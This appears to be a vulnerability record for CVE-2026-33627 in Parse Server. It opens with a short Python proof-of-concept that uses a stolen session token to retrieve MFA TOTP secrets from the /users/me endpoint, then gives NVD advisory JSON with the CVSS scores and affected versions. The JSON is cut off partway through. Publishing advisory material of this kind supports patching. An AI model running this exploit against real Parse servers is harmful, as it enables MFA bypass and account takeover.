CVE-2026-33627

import requests # Target configuration target_url = "http://vulnerable-parse-server.com/parse/users/me" session_token = "r:USER_SESSION_TOKEN_HERE" # Attacker obtained token application_id = "APP_ID" headers = { "X-Parse-Application-Id": application_id, "X-Parse-Session-Token": session_token } try: response = requests.get(target_url, headers=headers) if response.status_code == 200: data = response.json() print("[+] Successfully retrieved user data:") print(data) # Check for sensitive auth data (e.g., MFA secrets) if "_authData" in data: print("[!] Sensitive Auth Data Leaked:") print(data["_authData"]) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-33627", "sourceIdentifier": "[email protected]", "published": "2026-03-24T19:16:55.190", "lastModified": "2026-03-25T21:16:08.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.61 and 9.6.0-alpha.55, an authenticated user calling GET /users/me receives unsanitized auth data, including sensitive credentials such as MFA TOTP secrets and recovery codes. The endpoint internally uses master-level authentication for the session query, and the master context leaks through to the user data, bypassing auth adapter sanitization. An attacker who obtains a user's session token can extract MFA secrets to generate valid TOTP codes indefinitely. This issue has been patched in versions 8.6.61 and 9.6.0-alpha.55."}, {"lang": "es", "value": "Parse Server es un backend de código abierto que puede ser desplegado en cualquier infraestructura que pueda ejecutar Node.js. Antes de las versiones 8.6.61 y 9.6.0-alpha.55, un usuario autenticado que llama a GET /users/me recibe datos de autenticación sin sanitizar, incluyendo credenciales sensibles como secretos TOTP de MFA y códigos de recuperación. El endpoint utiliza internamente autenticación de nivel maestro para la consulta de sesión, y el contexto maestro se filtra a los datos del usuario, eludiendo la sanitización del adaptador de autenticación. Un atacante que obtiene el token de sesión de un usuario puede extraer secretos de MFA para generar códigos TOTP válidos indefinidamente. Este problema ha sido parcheado en las versiones 8.6.61 y 9.6.0-alpha.55."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "8.6.61", "matchCriteriaId": "D4DA9815-E34D-4E7A-BD6E-5F4F7F142192"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.6.0", "matchCriteriaId": "1BAC01F8-0899-482C-8D91-64671BF2859A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha1:*:*:*:node.js:*:*", "matchCriteriaId": "BBED261F-CA1B-44BC-9C3A-37378590EFEE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha10:*:*:*:node.js:*:*", "matchCriteriaId": "418338C9-6AEC-492C-ACA4-9B3C0AAE149C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha11:*:*:*:node.js:*:*", "matchCriteriaId": "808B6482-BF8E-407D-8462-E757657CC323"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha12:*:*:*:node.js:*:*", "matchCriteriaId": "B8 ... (truncated)